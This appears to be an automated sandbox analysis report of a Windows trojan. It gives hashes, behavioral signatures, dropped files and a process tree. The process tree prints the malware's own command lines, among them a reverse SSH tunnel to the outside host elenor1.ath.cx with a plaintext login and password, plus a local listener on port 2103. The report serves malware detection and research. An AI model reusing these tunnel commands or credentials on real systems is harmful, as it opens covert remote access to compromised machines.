Overview

overview

8

Static

static

bf66ab729c...4d.exe

windows7-x64

8

bf66ab729c...4d.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    77s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05/12/2022, 23:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe

  • Size

    289KB

  • MD5

    356682a0be072f6e5c12a796f16ea805

  • SHA1

    4b7df88263931fe8ee62564034dbcd8bd23f19f4

  • SHA256

    bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d

  • SHA512

    547e87ed6d4204bd45ffca9fe4f8fe73938cd8f5f6aa2d2fdf7f2fb113e7ae933c4c1b023fc08d739e99baebfe3bc3d5381ab16019ab9b3147482e6b21537504

  • SSDEEP

    6144:527gCbTehEqclWYacoztvRMFv4fYQdFLMmnyzf1Z4H2QqAlggvYSiC9if:527/bTehEqclrytve54fYIMAyzf1ZBAy

Score
8/10
evasiontrojanupx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Loads dropped DLL 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 33 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe
    "C:\Users\Admin\AppData\Local\Temp\bf66ab729cb0c77384bf58d0b34a0283d9e0c95b1e0b25c8699ff98d8b65874d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Data.msi\startup.vbe"
      2⤵
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Data.msi\alg.vbe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:888
        • C:\Data.msi\cssrs.exe
          "C:\Data.msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
          4⤵
          • Executes dropped EXE
          PID:1764
        • C:\Data.msi\System.exe
          "C:\Data.msi\System.exe" -ssh -R 16641:127.0.0.1:2103 elenor1.ath.cx -l linux -pw 2n3055
          4⤵
          • Executes dropped EXE
          PID:272
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1916 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1608

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Data.msi\DiskDoctor.lnk
    Filesize

    459B

    MD5

    8f5d6310e7fcf52fcb7509930ff14813

    SHA1

    198e6182d515a46167c0193d4d8c0fd985bf3185

    SHA256

    322d1f912491ab13e5362c4e8487cba773d8cde08c35ff518c9a882979204217

    SHA512

    be491e3fa3c99525b1116b328b1ccd9d45611a6e42961ee8649ee6261713f8c07f5906bad1e7c0552f6bf9e2f6c6f9db4be15c3067f6f1dd96e6aefcbbdb05ff

    Download Submit

  • C:\Data.msi\System.exe
    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

    Download Submit

  • C:\Data.msi\System.exe
    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

    Download Submit

  • C:\Data.msi\alg.vbe
    Filesize

    1KB

    MD5

    039c9b2c45642603aac8dc7c0999b2d7

    SHA1

    57038a7e45b8036c11d143b30153aaa69807aebf

    SHA256

    64d3282227598b86413632dd8bf8a1588c06c834fa4984900934d3dca7d99e12

    SHA512

    bbabd6af0be61ab989747b56b84ee55739e2993fe9f80017163b1b262be74d63825603fa6fc2797efb2e73fed65118e30a8f01e824226d3b523d2da6350db4a6

    Download Submit

  • C:\Data.msi\cssrs.exe
    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

    Download Submit

  • C:\Data.msi\cssrs.exe
    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

    Download Submit

  • C:\Data.msi\pic.url
    Filesize

    138B

    MD5

    49efe6d104d450d71d2ee7c513845e83

    SHA1

    ac8423b7ea4d7d7e27b67f3c6de03244dbfd5814

    SHA256

    8f9692895b703948cfddfd5160911c214a4ee53c219175fa12afeaef8214997f

    SHA512

    dffc2ac38d1602b31128acd1d3f6f75f9e03c7c481febf8397b52d385b68d6a919ff1f6584941530cf9f80734cba0273d489cc74e50b24dc2eaa2ff7ac905503

    Download Submit

  • C:\Data.msi\startup.vbe
    Filesize

    89B

    MD5

    27ebf479041e67364f960426655bb757

    SHA1

    1dcb48a9f8cbb99439262e06247eb830a519d74c

    SHA256

    e3964b6925d9dc1e1d74715992dd112bd9db960bf4c1c5af0324d0b2cf4f82eb

    SHA512

    c59ef8dc0f74f6e643306c35246436e31f60dc4ac158b12bdfe1dbdc7a40038e252dbaebecdfcf293792723cefa5f55f33cfe44b484f3d281d4876f260ee8197

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    340B

    MD5

    58ed47c5c1e3fa9f83f6502d46a6ad4a

    SHA1

    cee05360aee890b099266ff78fb5a95c1ffff315

    SHA256

    06767c1ab56f0ca8f3760a7383d829324fa5a83a6021080bb21c3e54e41bc2b9

    SHA512

    8c98a61aef83bf7c078cc53e0a7e1139b5ac10e6e41ea0019ad248d173ee539eb0369a957e57178565211768c46131d68edd4313aaab707c8269461527b47213

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IBB285WI.txt
    Filesize

    601B

    MD5

    f594610d32ac3072d0f7774f7a3e6693

    SHA1

    b6a6c9206885f7e9a630a9009d4d89e99d0da5d8

    SHA256

    8066600d39075ecf59be19f6a19db66ae89ef7dd207bd97c871bed9b27eb0488

    SHA512

    d7bc15b47137fc671764cb98602ea8a6ed03c150f965cd14d3f0cc1640ee31d6b150e6f16d564f7b80683531a805f591a00632c0ee68b73645b1f928dc751f38

    Download Submit

  • \Data.msi\System.exe
    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

    Download Submit

  • \Data.msi\System.exe
    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

    Download Submit

  • \Data.msi\cssrs.exe
    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

    Download Submit

  • \Data.msi\cssrs.exe
    Filesize

    62KB

    MD5

    9f06e2f8d96169dfe944aa37a15ffd40

    SHA1

    591960352fae52e1e2bdc575035bc0e4a3250cff

    SHA256

    8ab5987a651ccc7a7d9375ab4efe019cb5ea8ed2ff724ec900a1d054f0dec2ac

    SHA512

    7279cafd6df6bc3dda16daa21d176b2f4d51799b2ddca335f447ef4fdcd78b8cc84cad8f0b70a52402bd0c8ccf0f087cbd25808f12c55e27a21235568a66c2ca

    Download Submit

  • memory/272-79-0x0000000000400000-0x000000000045C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/888-75-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

    Download

  • memory/888-76-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

    Download

  • memory/888-78-0x0000000002D20000-0x0000000002D7C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/888-80-0x00000000008E0000-0x0000000000905000-memory.dmp

    Filesize

    148KB

    Download

  • memory/1504-54-0x00000000768A1000-0x00000000768A3000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1764-77-0x0000000000400000-0x0000000000425000-memory.dmp

    Filesize

    148KB

    Download